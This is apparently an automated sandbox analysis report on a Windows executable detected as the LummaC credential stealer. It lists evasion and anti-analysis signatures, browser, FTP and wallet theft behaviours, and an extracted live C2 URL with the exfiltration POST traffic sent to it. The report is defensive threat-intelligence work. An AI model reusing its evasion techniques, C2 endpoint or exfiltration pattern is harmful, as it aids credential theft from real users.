Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561604
MD5:9e7bc3b3dd97d4c8f7549b9c66b2314f
SHA1:516e616760a09479d2be4d2cc84da87d82d149b7
SHA256:ad78228ca872a46d56df0249f02c595ad33ddfd225e998bfe25fe358e3df1972
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9E7BC3B3DD97D4C8F7549B9C66B2314F)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1500687810.0000000000B64000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 7400JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 7400JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 7400JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:59:19.711680+010020283713Unknown Traffic192.168.2.749702104.21.33.116443TCP
            2024-11-23T21:59:21.806257+010020283713Unknown Traffic192.168.2.749703104.21.33.116443TCP
            2024-11-23T21:59:25.281274+010020283713Unknown Traffic192.168.2.749714104.21.33.116443TCP
            2024-11-23T21:59:27.645282+010020283713Unknown Traffic192.168.2.749720104.21.33.116443TCP
            2024-11-23T21:59:33.667605+010020283713Unknown Traffic192.168.2.749736104.21.33.116443TCP
            2024-11-23T21:59:37.476139+010020283713Unknown Traffic192.168.2.749744104.21.33.116443TCP
            2024-11-23T21:59:40.449425+010020283713Unknown Traffic192.168.2.749756104.21.33.116443TCP
            2024-11-23T21:59:46.111122+010020283713Unknown Traffic192.168.2.749768104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:59:20.413016+010020546531A Network Trojan was detected192.168.2.749702104.21.33.116443TCP
            2024-11-23T21:59:23.600917+010020546531A Network Trojan was detected192.168.2.749703104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:59:20.413016+010020498361A Network Trojan was detected192.168.2.749702104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:59:23.600917+010020498121A Network Trojan was detected192.168.2.749703104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:59:32.222550+010020480941Malware Command and Control Activity Detected192.168.2.749720104.21.33.116443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Found malware configuration
            Source: file.exe.7400.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
            Multi AV Scanner detection for submitted file
            Source: file.exeReversingLabs: Detection: 47%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49703 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49756 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49702 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49720 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49703 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49703 -> 104.21.33.116:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://property-imper.sbs/api
            Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49736 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49756 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49720 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49714 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49744 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49768 -> 104.21.33.116:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CO639FFAT00100User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12826Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ELAGYYVKSDFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15040Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8OW6FYRB5LGCQFPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20389Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5E9ZSLO7I9BJUYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1201Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KFOSZXIUWIOXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550170Host: property-imper.sbs
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.1462126171.000000000531B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
            Source: file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
            Source: file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
            Source: file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
            Source: file.exe, file.exe, 00000000.00000003.1601806618.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600993007.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602800267.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1544204856.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
            Source: file.exe, 00000000.00000002.1602997053.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1601608545.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600993007.0000000000B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/QjF
            Source: file.exe, 00000000.00000003.1500747997.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521728515.0000000000B5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1544204856.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521628927.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603020163.0000000000B5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1462325233.00000000052DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1529513028.0000000000B5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
            Source: file.exe, 00000000.00000003.1600993007.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602800267.0000000000AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiL
            Source: file.exe, 00000000.00000003.1500798867.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1500687810.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1500747997.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiv
            Source: file.exe, 00000000.00000002.1602997053.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1601608545.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600993007.0000000000B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/qk&
            Source: file.exe, 00000000.00000003.1463051061.00000000053F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.1463051061.00000000053F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
            Source: file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: file.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
            Source: file.exe, 00000000.00000003.1463051061.00000000053F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
            Source: file.exe, 00000000.00000003.1463051061.00000000053F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
            Source: file.exe, 00000000.00000003.1463051061.00000000053F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
            Source: file.exe, 00000000.00000003.1463051061.00000000053F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.1463051061.00000000053F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49703 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49756 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B408480_3_00B40848
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B408480_3_00B40848
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B408480_3_00B40848
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B408480_3_00B40848
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992763831967213
            Source: file.exeStatic PE information: Section: rlmvjdwl ZLIB complexity 0.9947327515615478
            Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.1378247608.00000000052ED000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377981408.0000000005309000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1402186025.0000000005306000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1402276345.00000000052FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
